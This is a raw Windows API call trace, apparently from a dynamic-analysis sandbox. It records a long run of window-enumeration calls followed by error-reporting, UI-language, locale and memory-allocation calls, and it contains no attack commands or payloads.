	[0362.585] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xca4
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc64
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc24
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb84
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xbac
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x384
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xab8
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x33c
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa44
	[0362.585] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa64
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x8a8
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xaf0
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x88c
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb04
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x910
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x230
	[0362.586] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xac0
	[0362.587] GetWindow (hWnd=0x30298, uCmd=0x4) returned 0x0
	[0362.588] IsWindowVisible (hWnd=0x30298) returned 0
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xab4
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xaac
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x3d0
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x978
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa7c
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x59c
	[0362.588] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa88
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa6c
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa68
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x9f8
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa04
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x924
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x8dc
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x7dc
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x768
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x764
	[0362.589] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x820
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x810
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x794
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x83c
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x7ac
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb44
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb5c
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x838
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.590] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x818
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x5b8
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x494
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x1ec
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x440
	[0362.591] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x7e8
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x730
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x2c8
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x31c
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x330
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x128
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x5c8
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x6f8
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x358
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x73c
	[0362.592] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb0
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x250
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x240
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x790
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x61c
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x540
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x538
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x568
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x538
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x568
	[0362.593] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x538
	[0362.594] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x540
	[0362.594] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x540
	[0362.659] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x57c
	[0362.659] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.659] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x554
	[0362.659] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.659] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x528
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x79c
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4e0
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.660] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x44c
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x778
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x558
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4d0
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe6c
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x6e8
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc6c
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf94
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xffc
	[0362.661] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf74
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf08
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf0c
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xed8
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xe90
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xea8
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfa8
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfbc
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfb8
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfb4
	[0362.662] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfb0
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfac
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfc0
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xfd0
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf88
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf84
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xf80
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xde0
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xddc
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xdd8
	[0362.663] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xd34
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xd10
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xd0c
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc9c
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc74
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc1c
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xc08
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xabc
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x24c
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xbb0
	[0362.664] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xbfc
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb10
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x374
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x368
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb28
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xae8
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb14
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x95c
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa8c
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x46c
	[0362.665] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb3c
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa90
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xad0
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa9c
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xaa0
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb1c
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x7e0
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa74
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x694
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xa28
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x9b0
	[0362.666] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x8d8
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x940
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x93c
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4ec
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x150
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x720
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x3c4
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x7d4
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x6c8
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb54
	[0362.667] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb54
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb5c
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x838
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x818
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x5b8
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x494
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x1ec
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x440
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x7e8
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x730
	[0362.668] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x2c8
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x31c
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x330
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x128
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x5c8
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x6f8
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x358
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x73c
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0xb0
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x250
	[0362.669] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x240
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x790
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x61c
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x568
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x538
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x540
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x79c
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x4e0
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x460
	[0362.670] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x14d960 | out: lpdwProcessId=0x14d960) returned 0x778
	[0362.674] WerSetFlags () returned 0x0
	[0362.682] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0362.682] CoTaskMemFree (pv=0x0) 
	[0362.683] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dcc0 | out: pulNumLanguages=0x14dcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dcc0) returned 1
	[0362.683] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dcc8, pwszLanguagesBuffer=0x2addb90, pcchLanguagesBuffer=0x14dcc0 | out: pulNumLanguages=0x14dcc8, pwszLanguagesBuffer=0x2addb90, pcchLanguagesBuffer=0x14dcc0) returned 1
	[0362.689] CoTaskMemAlloc (cb=0x24) returned 0x422910
	[0362.689] GetUserDefaultLocaleName (in: lpLocaleName=0x422910, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0362.689] CoTaskMemFree (pv=0x422910) 
	[0362.763] CoTaskMemAlloc (cb=0x104) returned 0x427f10
